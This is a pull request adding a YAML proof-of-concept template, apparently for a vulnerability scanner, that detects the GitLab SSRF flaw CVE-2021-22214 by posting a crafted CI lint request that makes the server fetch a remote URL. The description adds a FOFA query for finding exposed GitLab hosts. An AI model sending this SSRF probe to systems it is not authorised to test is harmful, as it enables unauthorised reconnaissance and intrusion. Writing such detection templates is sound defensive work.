### PR TITLE
add gitlab-ssrf-cve-2021-22214

### DIFF
--- a/pocs/gitlab-ssrf-cve-2021-22214.yml
+++ b/pocs/gitlab-ssrf-cve-2021-22214.yml
@@ -1,0 +1,14 @@
+name: poc-yaml-gitlab-ssrf-cve-2021-22214
+rules:
+  - method: POST
+    path: /api/v4/ci/lint
+    headers:
+      Content-Type: application/json
+    body: |
+      {"include_merged_yaml": true, "content": "include:\n  remote: http://baidu.com/api/v1/targets/?test.yml"}
+    expression: |
+      response.status == 200 && response.body.bcontains(b"\"status\":\"invalid\"") && response.body.bcontains(b"errors")
+detail:
+  author: mumu0215(https://github.com/mumu0215)
+  links:
+    - https://mp.weixin.qq.com/s/HFug1khyfHmCujhc_Gm_yQ

--- a/pocs/gitlab-ssrf-cve-2021-22214.yml
+++ b/pocs/gitlab-ssrf-cve-2021-22214.yml
@@ -7,7 +7,7 @@ rules:
     body: |
       {"include_merged_yaml": true, "content": "include:\n  remote: http://baidu.com/api/v1/targets/?test.yml"}
     expression: |
-      response.status == 200 && response.body.bcontains(b"\"status\":\"invalid\"") && response.body.bcontains(b"errors")
+      response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"{\"status\":\"invalid\",\"errors\":") && (response.body.bcontains(b"does not have valid YAML syntax") || response.body.bcontains(b"could not be fetched"))
 detail:
   author: mumu0215(https://github.com/mumu0215)
   links:


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
gitlab ssrf , 编号:CVE-2021-22214
## 测试环境
fofa语句：app="gitlab" 
## 备注
没有使用dnslog的方法，因为漏洞是否存在返回包的区别比较大，所以仅通过返回包内容判断
<img width="705" alt="Snipaste_2021-06-24_17-04-22" src="https://user-images.githubusercontent.com/40090857/123235237-417e8080-d50e-11eb-9243-fb8da97a309c.png">
